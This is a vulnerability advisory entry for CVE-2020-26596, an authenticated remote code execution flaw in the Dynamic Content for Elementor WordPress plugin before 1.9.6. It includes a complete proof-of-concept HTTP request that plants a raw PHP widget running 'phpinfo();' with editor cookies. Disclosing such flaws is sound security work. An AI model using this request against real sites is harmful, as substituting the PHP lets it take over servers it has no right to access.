Lucene search
WpvulndbWPEX-ID:05B0E3EB-82EA-4868-A037-D7EE3EACE8AAHistoryOct 08, 2020 - 12:00 a.m.
Dynamic Content for Elementor < 1.9.6 - Authenticated RCE
2020-10-0800:00:00
wpvulndb
8
The PHP Raw Widget (https://www.dynamic.ooo/widget/php-raw/) of the Dynamic Content for Elementor plugin before 1.9.6 did not properly check for user permissions, allowing accounts with a role as low as editor to perform RCE attacks.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/post.php?post=1&action=elementor
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1657
Origin: https://example.com
DNT: 1
Connection: close
Cookie: [Editor account cookies]
actions=%7B%22save_builder%22%3A%7B%22action%22%3A%22save_builder%22%2C%22data%22%3A%7B%22status%22%3A%22publish%22%2C%22elements%22%3A%5B%7B%22id%22%3A%227d8463f3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%2267a91131%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22434ded6e%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22editor%22%3A%22%3Cp%3E%3C!--+wp%3Aparagraph+--%3E%3C%2Fp%3E%5Cn%3Cp%3EWelcome+to+WordPress.+This+is+your+first+post.+Edit+or+delete+it%2C+then+start+writing!%3C%2Fp%3E%5Cn%3Cp%3E%3C!--+%2Fwp%3Aparagraph+--%3E%3C%2Fp%3E%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22text-editor%22%7D%5D%7D%5D%7D%2C%7B%22id%22%3A%22c011af3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22d8404b7%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%2C%22_inline_size%22%3Anull%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%228b4910d%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22custom_php%22%3A%22phpinfo()%3B%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22dce-rawphp%22%7D%5D%7D%5D%7D%5D%2C%22settings%22%3A%7B%22post_title%22%3A%22Hello+world!%22%2C%22scroll_viewport%22%3A%22%23outer-wrap%22%2C%22scroll_contentScroll%22%3A%22%23wrap%22%2C%22post_status%22%3A%22publish%22%7D%7D%7D%7D&_nonce=496eff7787&editor_post_id=1&initial_document_id=1&action=elementor_ajaxRelated
prion
prion
Code injection
2020-10-07 16:15:00
osv
osv
CVE-2020-26596
2020-10-07 16:15:17
patchstack
patchstack
wpvulndb
wpvulndb
Dynamic Content for Elementor < 1.9.6 - Authenticated RCE
2020-10-08 00:00:00
cve
cve
CVE-2020-26596
2020-10-07 16:15:00
Related for WPEX-ID:05B0E3EB-82EA-4868-A037-D7EE3EACE8AA